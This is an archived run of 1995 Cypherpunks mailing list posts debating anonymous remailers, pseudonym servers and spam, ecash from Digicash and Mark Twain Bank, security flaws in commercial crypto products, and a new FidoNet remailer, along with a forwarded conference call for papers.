> I think one solution to this problem is to encourage (require) the use of
> pseudonym servers. Having a server like alpha as the entity on the from
> line has several advantages.
> 
> 1) Less Spam since it takes some effort to set up the nym and it will be 
> taken away as soon as the spam starts.

I fear this will be a short-lived gain. User-friendly scripts for 
establishing pseudonymous accounts are pretty easy to write. They may be
beyond the average Fast Money Maker, but I expect myself and others will be
putting them out on the Net for general consumption. 

I can certainly imagine one of those scripts being expanded to automatically 
create salesdroid001@nymsrus.org, ..., salesdroid999@nymsrus.org and emitting 
the same spam once from each pseudonym to a different destination. You would
want to apply a statistical spam filter (of the kind mentioned recently by
Greg Broiles) to the entire output of each pseudonymizer in an attempt to
nip such spams in the bud.

Semi-permanent account status confers privileges to the user, IMHO. I
believe a pseudonymous account ideally should be treated the same as a 
regular account on an ISP. For example, an admin will not unilaterally close 
an account upon receiving a single complaint about the account user. 
Certainly I don't know of an ISP that routinely blocks its users' accounts
from sending mail to selected other accounts. Lest I seem too presumptuous, 
let me say that I realize all immediately foreseeable pseudonymizers are
free services. Clearly these service providers can set whatever policies they
wish, and are not directly competing with the fee-charging ISPs. Perhaps 
future fee-charging pseudonymizers will consider these criteria in offering 
enhanced services.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 15:58:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb027040402100417fa@[137.110.24.250]>
Message-ID: <199510232248.SAA26502@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell writes:
> If all nym servers were standardized to run from the same account name
> (nymserve for example) the remailers could be configured to only deliver
> final hops to addresses with that username.

A detail I missed before: the remailers used in pseudonym reply blocks must
somehow deliver replies to the True Name (verinymous ?) address of the holder
of the pseudonym. I suppose they could all finally be routed to the 
pseudonymizer, which would deliver the messages directly to the intended 
recipient (holder of the pseudonym). 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Mon, 23 Oct 95 18:49:20 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510240148.SAA26014@well.com>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca wrote:

>On Wed, 18 Oct 1995, t byfield wrote:
>
>> At 9:42 AM 10/18/95, Hal wrote:
>> 
>>         Of course. The problem is that protocols as implemented permit
>> header-forging: it's a practical fact of the net, and one that maybe
>> shouldn't be overlooked on (basically vague) 'moral' grounds, any more than
>
>The courts can't overlook it either. There goes liability. If I posted 
>pirated software from this account, according to what you're saying, I could 
>claim a forgery and show reasonable doubt.

How difficult is it to forge headers?  How difficult is it to trace a
message to the actual sender if the header is forged?  Is there a way to
quantify traceability on a simple scale, for rough purposes?

Lee

Lee Tien
Attorney
tien@well.sf.ca.us
(510) 525-0817 voice
(510) 525-3015 fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Mon, 23 Oct 95 18:49:50 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510240149.SAA26129@well.com>
MIME-Version: 1.0
Content-Type: text/plain


What is the cite for this statute?  

Lee

>At 11:47 PM 10/14/95 -0700, anonymous-remailer@shell.portal.com wrote:
>>Has anyone examined the legislative history associated with this statute?
>>
>>I would be surprised if they were singling out anonymous remailers.  They
>may have had other concerns regarding phone abuse, e.g., long distance fraud.  
>>
>>Then again, I could be full of it...
>>
>>
>Doesn't necessarily matter what the legislative history was.  When some
>prosecutor trying to make a name for himself hooks onto this language to
>prosecute an anonymous remailer or other perceived miscreant, nobody will
>remember what the intent was.  The casebooks are full of perversions of
>original intent.
>Jon Goldberg

Lee Tien
Attorney
tien@well.sf.ca.us
(510) 525-0817 voice
(510) 525-3015 fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 23 Oct 95 17:08:45 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <acac7cd8430210046e54@[205.199.118.202]>
Message-ID: <199510240008.UAA11781@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>THE ROLE OF THE "MESSENGER"
>
>But I think I have a longer term solution, one that involves a change in
>thinking about the differences between the _originator_ of a message and
>the mere _messenger_.
>
>The notion is to much more explicitly separate the functions of the
>"messenger" or "deliverer" from the "originator" or "sender." Granted, this
>is already done in the sense that a piece of e-mail goes through many
>hands. For example, Hal's message that I am responding to here has this in
>the header blocks, showing some of the "couriers" or "messengers":

This is an interesting notion, but one I don't think is quite right.
The anonymous remailer is not merely a courier.  It actively modifies
the message envelope by removing any indication of its origin.  The
main issue in Hal's quoted complaints are that the receiver isn't able
to contact the sender.  This fact is a direct result of the action of
the remailer.

Consider what would happen if a remailer were set up that *didn't*
remove the "From:" data.  Anonymizing remailer operators could attempt
to limit complaints by forwarding everything through the non-anonymizer
to make it the last link.  Who do you think would get the complaints?
The last anonymizer.

>A MAIL DELIVERY SERVICE (don't we already have them? yes, but....)
>
>So, how would this work?
>
>With remailers, even more steps need to be taken to make it absolutely
>clear that the delivered message is not _from_ the last Internet site that
>shows up in the "From:" field. More than just disclaimers are needed.
>
>One approach is for a _notification-based_ system. To wit:
>
>"You have a piece of mail awaiting at our mail delivery service. The
>originator is unknown. The title of the message is "Tentacles of Medusa
>Must Die!" You may retrieve this message by replying to this notification
>with the word "Yes" anywhere in the Subject field. This message will be
>kept for 60 days and then deleted."

I had a similar idea that I mentioned to Hal in a private message.  How
about a POP server that authenticates with crypto, and accepts and
holds email addressed to the keyid of a PGP key?  You send email to
4466A801@keymail.com it holds them for 30 days (or whatever) and
discards them.  When I connect to the server to retrieve my mail, it
asks for my public key, encrypts a random challenge with it, and I tell
it the decrypted version.  Having proved that I can read messages
encrypted to the key, it delivers messages addressed to the hash of the
key.  It might also allow me to configure an address where
notifications of new messages should be sent.

It's an interesting twist on the anon.penet.fi system, since you
needn't bother tracking all the nym/email mappings, and *can't* give
CoS any incriminating information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Oct 95 16:18:19 PDT
To: cypherpunks@toad.com
Subject: Re: Internet Security Review
Message-ID: <v02120d02acb1ce104d70@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:36 PM 10/23/95, Doug Hughes wrote:

>Just got a copy via mail today. Boy, Dorothy Denning seriously dings
>Tim May in this issue. Interesting reading to know what the other side
>is up to nonetheless. She uses some reasoning that will be compelling to
>many.

This makes me laugh out loud. I have Wit Beer coming out of my nose. My
poor trackball's going to take a major Windex job now, boy.

Denning *doesn't* go for a fellow(?) Certified Cryptographer(tm), probably
because her credentials are all but shot now. She *doesn't* go after
someone *paid* to go after *her* in the policy arena, like Banisar & Co.,
who could beat her with "half his brains tied behind his back". She
wouldn't *dare* go after the politicians like (sorry again, Rush) Mr. Newt,
who *are* thwarting her monomaniacal campaign to sperm^h^h^h^h^h<insert
bodily fluid here>-sample the population for biometric purposes, she goes
after *Tim* *Freakin'* *May* for chrissake.

Gotta watch that "corrupting the youth of Athens" stuff, Tim, 'cuz Big Bad
Ol' Dottie D's gonna get ya!

Feh. Hemlock anyone?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 19:28:14 PDT
To: cypherpunks@toad.com
Subject: Mark Twain Bank (was: Anonymity: A Modest Proposal) (fwd)
Message-ID: <199510240222.TAA03524@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> pretty steep for someone wanting to spend $.10 on something.) My
> understanding is that the _bank account_ is FDIC insured, but not
> the ECash. I could be wrong -- their materials are extremely confusing
> and hard to follow.

	My understanding is that the accounts are "WorldCurrency
Access" accounts-- which appear to be Money Market funds, which can be
denominated in one of 25 currencies. (Ecash-linked accounts must be
denominated in dollars.) Being a money market fund, a positive return
is -not- guaranteed, and it is not FDIC insured. It is an "investment"
account, not a "savings" account. (That is my understanding, which
could very well be flawed.)

	Does anyone understand their non-merchant pricing structure?
It had me very confused. Also, what is the difference between a
merchant and a non-merchant. I saw nothing on the pages describing
that. Suppose Community ConneXion wanted to accept ecash. Could we get
a non-merchant account?

> 
> As one of my co-workers said today, "It will be interesting to sit
> back and watch them take regulatory mortar fire." Indeed.
> 
> I'm really hoping that they pull their act together -- I've already
> sent in my account application -- but things look really grim at
> the moment. There are certainly a lot of projects list members are
> working on that would be greatly enhanced by functioning, popular
> e-cash. I encourage everyone to give them lots of helpful feedback
> so that they can turn this around.
> 
> On another note, I'm hoping that some of you will also bite the
> bullet, get accounts, and join me attempting to win valuable
> prizes in Sameer's "Hack Digicash" promotion. I'd rather see one
> of us find holes in this than see the whole thing melt into the
> ground.
> 
> This extremely unprofessional, bungled launch does, I admit, make
> Mondex (with scads of beautiful marketing literature) look better all
> the time, although based on some conversations on Sunday, it appears
> that they may have _extremely serious_ architectural security problems.
> We'll see how things play out.
> 
> Later,
> 
> Doug
> 
> >        With the release of digicash I hope that we can soon make this
> >stuff for-pay and much of the spam problem will be fixed. (Not all of
> >it, of course.)
> >        (I am rather hesitatnt to setup an account with Mark Twain
> >though.. $2,500 min balance and not FDIC insured?)
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 23 Oct 95 02:33:59 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.LNX.3.91.951023161515.27409A-100000@ima.net>
Message-ID: <Pine.SOL.3.91.951023192908.6735B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Enzo Michelangeli wrote:
> Adding MD5 support wouldn't be a bad idea. Same for algorithms 
> alternative to Blowfish (3DES etc.) and DH (e.g., with Elliptic 
> functions-based key exchange), all automatically negotiated at connection 
> time.

Starting to sound like you want the crypto layer to be SSL (v3 for DH) or
PCT :-).

eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 23 Oct 95 17:02:50 PDT
To: cypherpunks@toad.com
Subject: Hacking Digicash (was: Article on Digital Cash in "Worth")
In-Reply-To: <acade6614d0210045f23@[205.199.118.202]>
Message-ID: <46haei$i6o@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <acade6614d0210045f23@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
>Not that the issues aren't real, just that a lot of folks
>want to be the "next Goldberg and Wagners," or that they want to add their
>two cents about how Netscape is blowing it.

What about us "current" Goldbergs and Wagners? :-)
>
>I stay out of this, but I certainly don't want to see Digicash given the
>same treatment. Their current product may not be all that some of us desire
>(in terms of anonymity, for example), but it sure does beat the
>alternatives in essential ways.
>
>I don't want to see Netscape so trashed that people turn to lesser-tested
>alternatives without good reason (Microsoft Network being one example), and
>I don't want to see Digicash so trashed that people turn to some product
>like Mondex.

We should be keeping in mind that the goal here is to end up, in one way
or another, with a _secure_ way of transacting on the net.  To that end,
it may be necessary to demonstrate that some current products don't
provide that way.  We certainly don't want people to be scared away
from using one insecure product, only to use another, especially
if the latter is less secure than the former.

At least Netscape published their protocols, if not their implementation.
Digicash, AFAIK, hasn't even done that much.  There is absolutely zero
reason for me to believe that their client is safe.
<SARCASM>For all I know, it could be an essential part of the protocol
to send a dump of my harddrive to Digicash every time I deposit money
into my account.</SARCASM>

I do intend to attempt a reverse-engineer of the ecash protocol,
assuming no one points me to an online copy (no, a paper copy obtained
via a NDA doesn't count).  Donations of a Sparc client binary
and/or access to a real ecash account will be gratefully accepted.

If the reverse-engineer ends up showing a protocol misfeature or
(more likely) a bad implementation (such as a buffer overflow),
I'm not going to keep quiet about it.  Netscape reacted quite
commendably to the finding of bugs in their software (quick admission
of the problem, and timely bugfix).  Hopefully, Digicash will
be as good about it.

Everything would be _so_ much easier to check, though, if these
people would stop this "security through obscurity" garbage and
publish their protocols, if not their source.

   - Ian "Mr. Worf, activate targetting scanners."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 23 Oct 95 17:27:26 PDT
To: tcmay@got.net
Subject: Re: The NSA Visits Compendium
Message-ID: <9510240024.AA23881@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


perhaps we can get epic or eff to archive copies of export requests?

Perhaps companies would be willing to file copies of "we asked to
export this" after the decision was made?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 23 Oct 95 18:33:51 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
In-Reply-To: <acb06aea5b021004cdd9@[205.199.118.202]>
Message-ID: <199510240133.VAA13731@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>Worse, idle speculation about possible security flaws seems wasteful.

Not always.  A couple of months ago someone was asking what the fuss
was about in making sure random number generators were secure.  In
describing potential problems with poor RNG seeds I "idly" speculated
that if Netscape has a lousy RNG that it might be *lots* easier to
attack that than the (then current) brute force attack was.

A week or to later, Ian posted a reverse engineered copy of the
Netscape RNG stuff, and a week or so after that announced his big
hole.

Occasionally, idle speculation sparks good ideas.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 23 Oct 95 21:48:59 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510240433.AA28545@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Lee Tien writes;
>
> What is the cite for [the PA anti-remailer] statute?
>

Pennsylvania Consolidated Statutes, Title 18, Sections 910 and 3926. 
It's available on the web at http://moose.erie.net/~italo/rssb655.html
- - the Westlaw version of the enacted bill is at "1995 PA S.B. 655 (SN)".


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIxskH3YhjZY3fMNAQGkCgQArF13peddXG+zXThyf2uz7Syo7/sQpLtx
2f5UNaPE0VMZbk/rnAq2KbeBjqiOQ6waQ7awQXs1EFnBfAhIUONeI66fdX2OJY+0
X7Nw4hq06pWk/3HSl58Svd5EgZ1yjzylWn1tutAa5e3SPlKV5ABextzN2EnAB8Vd
8/cI687VeT0=
=te/3
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Date: Tue, 24 Oct 95 01:38:27 PDT
To: cypherpunks@toad.com
Subject: Re: FidoNet Remailer
Message-ID: <540_9510240301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNED MESSAGE-----

Thanks to all of you who have responded to my announcement of the FidoNet
remailer.  I appreciate the good words.  So far, the remailer has handled
everything that you have thrown at it.  One remailed message bounced back
to me because the FidoNet/internet gateway system could not find the
addressed system.  That one looks like a gateway problem.

Please keep sending messages through it.  Send grunged messages, improperly
addressed messages -- anything you can think of to make it barf.  I want it
to be able to withstand the vicious attacks that I'm sure will come once
the control phreaks in Fido find it exists.

I will be gone the next two weeks, so the system may go down.  Don't expect
any response from me until then, either.   I will answer any mail when I
return.  In the meantime, I'm off tomorrow morning to enjoy Vincent
Cate's hospitality at the Anguilla cypherpunks meet.


Jim - International SecureMail Host (ISMH)
PGP key 1024/B7822B3D
fingerprint =  0F F4 79 06 3B 33 99 D1  07 36 66 66 80 85 76 B3

Protect your right to privacy. Say no to GAK.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIxwyCWTIMO3gis9AQFFqgP/eODPSOVdx3yMHnTRqWzSNkGVFTxf66rs
9JahzuOrM8lleL+RDCAJXYL/bhPcYKwcOWcgMrri/WZjIBsf/uS1WtDO+v1cOnv5
p5doPIslL/8dZlUJGMeWblNeCj4recHwX+dZQxLyFAPbhDtpF9AzEmsF4Ch0Q8b8
N3y02QVHOr0=
=WYIx
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Date: Tue, 24 Oct 95 01:38:27 PDT
To: cypherpunks@toad.com
Subject: FidoNet Remailer
Message-ID: <53f_9510240301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNED MESSAGE-----

I have been a long time lurker on this list, as well as having a long time
interest in crypto.  Most of my activity in this area has been on FidoNet
rather than the internet.  Due to the control phreak nature of much of
FidoNet, I've spent a lot of time and effort in an attempt to just simply
route around the bastards.  I created the SecureMail system, which is a
network of FidoNet nodes that agree to route any and all traffic without
monitoring or censorship.  Within SecureMail, encrypted traffic is not
only permitted, it is encouraged.

Which brings me to the point of this message.  I have written a anonymous
remailer program for FidoNet.  It is currently running on my FidoNet node
in an alpha test mode.  It has only been running a couple of weeks, and
seems to be doing quite well.  I have just added internet addressability
to it.  What this means is that now anonymous messages can be remailed
between FidoNet and the internet.  Having still another routing path should
further decrease the traceability of these messages.

I would like to ask the cypherpunks to help me test the remailer across
the gateway.  Please send many messages through this remailer from both
the FidoNet and the internet side of the gateway.  Try to break it.  I
want a good reliable piece of software, and if it can survive attempts
by this group to break it, there will be a lot more confidence in it.

Following are instructions for using the FidoNet remailer:

- From FidoNet, send your message to Remail at 1:216/21.  From the internet,
send your message to: remail@f21.n216.z1.fidonet.org

In all cases, the first text line of the message must contain a double
colon.  The second line contains the remail command, and the third line
is blank.  The actual text to be remailes starts on line 4.


To send a message to Joe Sixpack at FidoNet address 1:102/903, enter:
::
remail-to: Joe Sixpack @ 1:102/903.


To send a message to an internet address, enter:
::
remail-to: tcmay@got.net

(Sorry, Tim -- couldn't resist using you as an example :-) 


To get a short help file, enter:
::
help


To post a message to the FidoNet SYSOP Echo, enter:
::
remail-to: SYSOP



I'll welcome discussions of this remailer on the list, or in private mail.
Bug reports and/or comments are encouraged.  I can be reached at
Jim.Cannell@f21.n216.z1.fidonet.org


BTW, I will be at the cypherpunks meeting in Anguilla next week.  Hope to
meet some of you there.



Jim - International SecureMail Host (ISMH)
PGP key 1024/B7822B3D
fingerprint =  0F F4 79 06 3B 33 99 D1  07 36 66 66 80 85 76 B3

Protect your right to privacy. Say no to GAK.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIg6pSWTIMO3gis9AQEKLQP/TVodxgTJiik3KQK1C8QgSp/O3wzdxi+P
eC2flE6qgtlmwh6X4vbBNTmj4bKAfGLgbJyvdcMAZCESYab1dxO8q1lwOAnayW8d
qoSRhL+zT0KepmV5FXyLscq+SbzgxKoX3gkWgHlhrhHbmycr3rFGLKz6ZsoR/xmb
WX16LX2JVFk=
=vBaR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 21:51:06 PDT
To: iang@cs.berkeley.edu
Subject: Re: Hacking Digicash (was: Article on Digital Cash in "Worth")
In-Reply-To: <46haei$i6o@calum.csclub.uwaterloo.ca>
Message-ID: <199510240445.VAA12282@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> We should be keeping in mind that the goal here is to end up, in one way
> or another, with a _secure_ way of transacting on the net.  To that end,
> it may be necessary to demonstrate that some current products don't
> provide that way.  We certainly don't want people to be scared away
> from using one insecure product, only to use another, especially
> if the latter is less secure than the former.


	This is the goal, but one must make sure that one's work does
not work -against- one's goal. My original draft for the hack digicash
web page was rather inflammatory "hasn't netscape taught us anything?"
but upon consultation I decided to change it to be less inflammatory
and mention that digicash, in principle, is the best electronic
payment system on the net, and that we need to make sure it is the
best payment system -in practice-.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 23 Oct 95 22:16:02 PDT
To: jirib@cs.monash.edu.au
Subject: Re: [reformatted] how secure can privasoft be?
Message-ID: <9510240512.AA07092@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > This seems paradoxical. PrivaSoft uses a key approximately 30 bits long. It
> ...
> > Two possible explanations I can imagine are:
> > 
> > (0) PrivaSoft actually uses a key longer than 9 digits, and someone just made
> ...
> 
> Could it be 9 hex digits = 36 bits?

A nine digit number, 999,999,999 can be stored as 0x3b9ac9ff. Note that this is
eight 4bit hex digits, or 32 bits, except the top nibble only has two bits
used, or its 30 bits.

> > The information contents a clear message
> 
> This is a strange title (I suspect "of" dropped out), but it might
> well sum it all up :-)

Nah, I suggested they reformat into 80 columns and suggested a different title
for this section, but they went with it.  They wanted it fer sure.  I just don't
know what it means.

> > a significant 
> > portion of the page must be reconstructed, and a significant amount of 
> > mathematical correlation must be calculated between neighboring areas of the 
> > image, before the cracking software can tell whether the candidate key is 
> ...
> 
> This can at most buy you a constant factor - useful, but not very.
> I doubt the two uses of "significant", too. Anybody remember those
> diagrams in Typing textbooks about the layout of a letter?

Someone else on this list mentioned that an edge detection algorithm would help 
here.  You wouldn't have to try to detect letters if there were no edges.
It could give you a quick go/no go.

> > The cryptographic engine can be customer-furnished and customer integrated, 
> 
> What do they mean by this bit?
> 

They mean that if you don't feel secure with theirs, you could use yours in
their framework...it's the pluggable encryption that NSA has had such a hard
time with but seems to be in favor of now.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 19:14:52 PDT
To: tien@well.sf.ca.us (Lee Tien)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510240148.SAA26014@well.com>
Message-ID: <199510240214.WAA05020@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lee Tien writes:
> How difficult is it to forge headers?

Trivial. If you want to make even the Received: headers look right, it
takes a bit more work, but its possible.

> How difficult is it to trace a message to the actual sender if the
> header is forged?

If they know what they are doing, its very hard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Oct 95 19:41:44 PDT
To: cypherpunks@toad.com
Subject: (fwd) WebNet-96 CFP (San Francisco)
Message-ID: <v02120d00acb2028bbb31@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "assoc. advancement computers ed." <aace@poe.acc.virginia.edu>
Subject: WebNet-96 CFP (San Francisco)
To: AACE <aace@virginia.edu>
Date: Mon, 23 Oct 95 21:00:21 EDT

  ----------------------------------------------------------------

  The complete WebNet-96 Call for Papers may be obtained by returning
  the information request form below or online from the AACE home page:

          http://aace.virginia.edu/aace/conf/calendar.html

   +*************************************************************+
   *                                                             *
   *                     W e b  N e t - 9 6                      *
   *                                                             *
   *            WORLD CONFERENCE OF THE WEB SOCIETY              *
   *                                                             *
   *                                                             *
   *         October 16-19, 1996 * San Francisco, CA USA         *
   *                                                             *
   *                                                             *
   *                 FIRST CALL FOR PARTICIPATION                *
   *                                                             *
   *              Submission Deadline: March 1, 1996             *
   *                                                             *
   *          Papers * Short Papers * Panels * Tutorials         *
   *             Workshops * Demonstrations * Posters            *
   *                                                             *
   *                       Sponsored by                          *
   *                 The Web Society and AACE--                  *
   *  Association for the Advancement of Computing in Education  *
   +*************************************************************+

                              ----------
                              INVITATION
                              ----------

WebNet-96 -- the first World Conference of the Web Society is an
international conference, organized by the Association for the
Advancement of Computing in Education (AACE). This annual conference
serves as a multi-disciplinary forum for the dissemination of information
on the research, development, and applications on all topics related to
the use, applications and societal and legal aspects of the Web in
its broadest sense, i.e. encompassing all modern tools to peruse the
Internet.

This conference is a must for all who plan to use the Internet for
informational, communicational or transactional applications
or, who are currently running or planning to run servers on the Internet.

We invite you to attend the WebNet-96 conference and submit proposals for
papers, panels, tutorials, workshops, and demonstrations/posters. All
proposals are reviewed for inclusion in the conference program.

Major Topics
------------
  Novel Applications of the Web
  Collaboration Using the Web
  The Web as Teaching Tool
  Electronic Publishing and the Web
  The Web as Marketing Tool
  Offering Services on the Web
  New Server Technologies for the Web
  New Navigational Tools for the Web
  Integration of Web Applications and Services
  Country Specific Developments
  The Web and Distance Education
  Net-based Multimedia/Hypermedia Systems
  Computer-Human Interface (CHI) Issues
  New Graphic Interfaces for the Web
  The Web and 3D
  Virtual Reality on the Web
  Intelligent Agents on the Web
  Directory Services on the Web
  Network Software for Large Data Bases
  Security and Privacy on the Web
  Charging Mechanisms for the Web
  Legal and Societal Aspects of the Web
  Courseware development for the Web
  Building Knowledge Bases on the Web
  Care and Feeding of Web Servers
  Educational Multimedia on the Web
  Browsers,Searchers and Other Tools
  Feedback Mechanisms on the Web

Conference Background
---------------------
WebNet is the annual conference of the Web Society that was founded in 1995
out of a concern that an organisation addressing the application aspects of
the Web and representing a lobby for Web users independent of specific
platforms and without the domination of commercial organisations was needed.
The WebSociety complements existing other bodies such as the Internet
Society and W3C. The former is, by definition, more concerned with
providing global Internet services than anything else and the latter is
specifically oriented towards one particular system WWW. The Web Society
and hence WebNet takes a more general view, dealing with a variety of
modern Internet tools and their integration including services such as
Gopher, WWW, Hyper-G, WAIS, directory services, FTP, email and cooperative
applications and novel approaches from Hot Java to VRML, from Web compatible
teaching modules to 3D interfaces.

For more details on the Web Society, see  http://info.WebSoc.org

              O /                                 O /
-------------- x  ----------  Cut Here  ---------- x -------------------
              o \                                 o \
                         -------------------
                         INFORMATION REQUEST
                         -------------------

To receive future WebNet-96 announcements, please complete this form
and return to the address below.

  Name: _________________________________________________________

  Address: ______________________________________________________
[A
  _______________________________________________________________

  City/State/Code: ______________________________________________

  Country: ______________________________________________________

  E-Mail: _______________________________________________________

Please send me:
 __  Call for Participation
 __  Registration material
 __  Proceedings ordering information
 __  Brochure on the Web Society
 __  Brochure on Association for the Adv. of Computing in Ed. (AACE)
 __  Other information (please specify) _____________________________

Return to: WebNet-96/AACE
           P.O. Box 2966
           Charlottesville, VA 22902 USA
           E-mail: AACE@virginia.edu; 804-973-3987; Fax: 804-978-7449
           http://aace.virginia.edu/aace
=====================================================================

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 23 Oct 95 07:14:48 PDT
To: remailer-operators@c2.org
Subject: Re: require for new remailer list tag?
In-Reply-To: <199510230707.DAA22204@opine.cs.umass.edu>
Message-ID: <199510231159.AA11017@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I'm curious about the potential sociological effects of such a move. I
>imagine that pseudonyms would be attracted to "permanent" remailers for
>use in their reply chains. But this phenomenon could/should be mitigated by
>the possibility that sting remailers would tend to advertise themselves as
>"permanent" (truthfully, even !), in anticipation of the bias in pseudonym
>remailer chain inclusion.

Personally I would be attracted to a fly-by-night remailer that was only up
for a short period of time. This is based on the [reasonable] assumption that
when the remailer is taken down, then any existing logfiles are also toasted.

A 30 minute remailer could exist by advertising in a known pool of billboards,
advertising it's service, free or for cyberbucks for the next 30 minutes
only. People wishing to send anon email would scan the current remailers,
do a nym check for a superficial check of reliable message delivery, then
negotiate with the mailer to ensure it is still accepting, and then deliver
the message. Less than 30 minutes later the remailer is gone and your message
is queued up or sent as per the contract.

Any LEA/monitor/Co$ would have a hard time trying to suppoena records from
a program that removed all traces of itself within minutes of it running.
If the mail isnt delivered you can choose to bad bad on the nym to the
relevant nym rating services. If it is you can allocate kudos to the nym's
good name.

You could use the "2 cyberbucks for 30 minutes" remailer as your front end
into the pool or the final delivery point or whatever your preference.

